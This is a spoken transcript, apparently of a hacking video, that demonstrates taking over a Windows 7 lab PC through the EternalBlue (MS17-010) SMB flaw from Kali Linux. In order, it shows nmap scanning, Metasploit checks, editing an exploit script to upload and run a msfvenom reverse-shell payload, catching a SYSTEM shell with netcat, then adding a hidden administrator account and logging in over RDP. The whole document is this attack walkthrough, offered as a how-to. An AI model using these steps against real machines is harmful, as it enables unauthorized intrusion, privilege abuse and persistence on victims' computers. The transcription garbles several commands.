Hey guys, welcome back to another episode of Nobody at All. So today I'm going to show you guys how can I own a Windows PC from my Kali Linux. So first of all, this is my Windows 7 PC. I'm going to show you the properties of it. It's a Windows 7 Home Premium x64-bit PC. So first of all, we need to know what's the IP for this first. IP okay, 192.168.0.145. So now the first thing we need to check and see, does the SMB port open or not? So we use nmap to check and see. 4.5 and 2.168.0.145. Okay, nice. So the 445 port is open. So the next thing, we need to use a Metasploit module to check and see, does the 445 port vulnerable to Eternal Blue exploitation, which is the MS17-010 exploit. So we search for MS17-010. So we use auxiliary scanner for this one to check and see. Use so options, set the host to 192.168.0.145. Okay, we exploit it. Okay, nice, good man. The host is likely vulnerable to MS17-010, so the SMB port is vulnerable to the exploit. So the second thing, we need to open our share on it first, but before that we need to edit the IP. We need to edit into the etc host to edit the host name. So sudo edit etc host. Okay, so this one we edit the IP 192.168.0.145, edit into tester PC. And then we need to open the share first with using SMP at client tester PC users. Now we need to put a -n because we need to log in without password. Okay, nice, we enter into it already. So exit. Now we need to edit the script first, the exploitation script. So we use gedit ms17-010. Okay, the first thing we need to edit is the username. We need to put a // right here because we want to log in as a guest mode. The second thing is the SMP port. So over here we need to uncomment these two lines because we need to send our file into the remote PC if using these two lines. So our payload will be over here, and then this is a command to execute the payload. So now we need to generate our payload first. We use msf-random to generate the payload. So msf-random p windows shell reverse tcp, and then the live host will be our PC. So what's the IP for our PC? Okay, so 192.168.0.134, 168.0.134. Our port we're going to set as 1890. Then the file will be exe file. It's saved as payload.exe. This is going to take a while to let the MSF random to generate the payload. So we wait for a while first. Nice. The payload has been successfully generated already. So now let's edit back the script again. So we need to change here what's the current directory. So this one is the current directory. We copy it. We change this line. Oops. Paste it. Then put payload.exe. Okay, then another line. This one will be the place that is saved in the remote PC. If going to save in the local DC, and this is the file name for it, payload.exe. And then now over here, cmd-c, we're going to put c/payload.exe to let them execute in the local DC, the payload.exe, the file. So we save the script, we close it. So now, before we run the script, we need to check and see what are the other arguments that it needs in the script. So Python MS17. So the first argument will be the IP, the second will be the pipe name. So how can we find the pipe name? We find it using the Metasploit module. So back search pipe. There's a lot here. We're going to search auxiliary scanner. So this will be the one auxiliary scanner, SMB pipe auditor. We use this one, and then clear out everything else. Options. We set our rhost can already. Set rhost 192.168.0.145. We run it, exploit. So these are all the pipe name that we can use, but this time I'm going to choose LSARPC. So before we start the exploit, we need to open our listener first using netcat. Let's see, LVMP 18890. Okay, we open our listener first, then we execute our payload. MS17 192.168.0.145, and then LSARPC. Okay, LSARPC. Nice. Finally, our netcat has caught the reverse shell. So you can see who am I. We are the anti-authority system. So we successfully own the PC right now. So let's try and see, can we create a file on the desktop over here. Okay, cd users dir cd tester cd desktop. Okay, create echo pc font. We save this as font.txt. See, that's a file created on the remote PC. You can see it's the same string that I sent over here. So we can successfully execute a file here and can create a file there too. So it means that we are successfully connected into the remote PC. So right now, I'm going to show you guys how can I use RDesktop to access the RDP port. So the first thing we need to is we create a sub account, or we can try to log in as this account. But we need to execute a registry first, registry key. So it is a registry key that we need to execute. So we copy, paste over here, execute it, and then we try and see using RDesktop. Then SU tester, then the IP 192.166.0.145. Okay, we try to log in and see. Oh my god, I don't know what's the password for it, but never mind. Let's create another account if we didn't know the password for it. Net user tester 67 tester 12345 add, and then we need to add this one into a local group. Net local group. Then we need to add it into administrators for user account 67. Yeah, which part I missed, man? Net local group administrator tester 67. Which part I missed? Add administrators, the username. Which part I missed? Oh, I typed twice net. Okay, successfully created. Now we're using RDesktop to enter into our sub account. So RDesktop -u tester 67 192.166.0.145. Okay, we log in as this other account, tester 12345. It's gonna take a while because we just created a new account, right? It need to takes a while to prepare the desktop. So let's just take a while for it first. Okay, we just move over the PC, we try and see if there's anything else. Desktop, the system info, we try and see system info. It's gonna take a while to over here. Okay, nice. So we have successfully entered into our new account, tester67. So now let's try and see if we can access into the old folder now, which is the tester folder. So we go to user. So this is the payload that I've sent just now. So tester. Okay, continue. Desktop. See? Born. Let's try and see I create another text over here. I type test. Hey, I've on your PC with RDesktop. Yeah, RDP port. Save it. Let's try and see over here. See? The text file is created over here too. So that's all for my video. If you like my video, do like and subscribe my channel for more video in the future. Thanks guys. Bye.